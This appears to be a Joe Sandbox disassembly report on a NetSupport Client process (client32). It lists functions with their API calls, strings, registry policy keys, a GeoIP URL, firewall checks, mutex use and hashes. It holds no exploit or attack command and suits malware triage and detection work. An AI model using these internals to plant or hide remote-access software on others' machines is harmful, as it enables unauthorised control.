Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
API String ID: 3298063328-2190704750
Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52

Function 11084F50 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,CF3D35D0,025E6E50,025E6E40,?,00000000,1117ED9C,000000FF,?,11031392,025E6E50,00000000,?,?,?), ref: 11084F85

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
wsprintfA.USER32 ref: 1108505B
wsprintfA.USER32 ref: 11085072
wsprintfA.USER32 ref: 11085089
CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA

Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,025E6E50,00000000,?,?,?), ref: 11084BD8
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,025E6E50,00000000,?,?,?), ref: 11084BEB
Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,025E6E50,00000000,?,?,?), ref: 11084BFE
Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11085200,?,11031392,025E6E50,00000000,?,?,?), ref: 11084C11

Strings

GetInventoryEx, xrefs: 11084FC7
Cancel, xrefs: 11084FB9
%s_SW.%s, xrefs: 1108506C
%s_HF.%s, xrefs: 11085083
%s_HW.%s, xrefs: 11085052
GetInventory, xrefs: 11084FA5
PCIINV.DLL, xrefs: 11084F80

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 3281479988-2492245516
Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91

Function 1102FF34 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D

Strings

SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1102FFB0
istaUI, xrefs: 1102FF8F
/247, xrefs: 11030098
PCIMutex, xrefs: 11030064, 11030083
_debug\tracefile, xrefs: 1102FFDB
_debug\trace, xrefs: 1102FFCA
SetProcessDPIAware, xrefs: 11030103

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62

Function 11027E10 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 130librarysynchronizationCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

wsprintfA.USER32 ref: 11027E84
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
wsprintfA.USER32 ref: 11027F01
CloseHandle.KERNEL32(?), ref: 11027F17
CloseHandle.KERNEL32(?), ref: 11027F20
LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95

Strings

SetClientResLang called, gPlatform %x, xrefs: 11027E2C
Setting resource langid=%d, xrefs: 11027F41
pcicl32_res.dll, xrefs: 11027F59
", xrefs: 11027E5A
\GetUserLang.exe", xrefs: 11027E7E
Locales\%d\, xrefs: 11027EF1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-1744591295
Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0

Function 1102C030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
GetTickCount.KERNEL32 ref: 1102C09A

Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A

GetTickCount.KERNEL32 ref: 1102C194

Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB

Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
CloseHandle.KERNEL32(?), ref: 1102C2A8

Strings

http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C0B5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C2D9, 1102C2ED, 1102C301, 1102C315
LatLong, xrefs: 1102C058, 1102C145
GetLatLong=%s, took %d ms, xrefs: 1102C1B1
_debug, xrefs: 1102C0E8, 1102C14A
?IP=%s, xrefs: 1102C126
GeoIP, xrefs: 1102C0E3
IsA(), xrefs: 1102C2DE, 1102C2F2, 1102C306, 1102C31A

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61

Function 11060CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA

Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
RegCloseKey.ADVAPI32(?), ref: 11060E21

Strings

Client, xrefs: 11060D9A
Software\Policies\NetSupport\Client\Standard, xrefs: 11060D0D
%s\%s\%s\, xrefs: 11060DA4
Software\Policies\NetSupport, xrefs: 11060D9F
Client, xrefs: 11060D08, 11060E38
DisableUserPolicies, xrefs: 11060E33
Client.%04d.%s, xrefs: 11060D87
Software\Policies\NetSupport\Client, xrefs: 11060CF4
Standard, xrefs: 11060D66

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5

Function 11134AC0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11134B22

Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

GetTickCount.KERNEL32 ref: 11134B31
_memset.LIBCMT ref: 11134B73
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
_strrchr.LIBCMT ref: 11134B98
_free.LIBCMT ref: 11134BEA

Strings

No ICF present, xrefs: 11134C22
IsICFPresent..., xrefs: 11134B0F
ICFConfig2 returned 0x%x, xrefs: 11134BF0
*AutoICFConfig, xrefs: 11134AF7
Client, xrefs: 11134AFC
ICFConfig, xrefs: 11134AD5
IsICFPresent() took %d ms, xrefs: 11134B3D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1

Function 68597610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 68597642
connect.WSOCK32(00000000,?,?), ref: 68597659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 68597660
_memmove.LIBCMT ref: 685976D3
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 685976F3
GetTickCount.KERNEL32 ref: 68597717
ioctlsocket.WSOCK32 ref: 6859775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68597762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6859777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6859778B

Strings

General, xrefs: 68597683
*BlockingIO, xrefs: 68597732
ConnectTimeout, xrefs: 6859767E

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
Instruction ID: 30e65d9f3c13ca9ba06203294eaad4451362e010f8f7e2b579c452b5405bcc0f
Opcode Fuzzy Hash: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
Instruction Fuzzy Hash: 1441EB759403149BEB20DF64CC48BEEB3BAEF84305F8044AAE90997181EB705E58CFA1

Function 11131260 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
GetSystemMetrics.USER32(00000021), ref: 111312C9
GetSystemMetrics.USER32(0000000F), ref: 111312D1
GetSystemMetrics.USER32(00000004), ref: 111312D7
GetDC.USER32(00000000), ref: 111312E3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
ReleaseDC.USER32(00000000,00000000), ref: 111312FA
CreateWindowExA.USER32(00000001,NSMWClass,025D0BA0,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357

Strings

CreateMainWnd, hwnd=%x, e=%d, xrefs: 1113135F
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 1113130E
NSMWClass, xrefs: 11131349

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
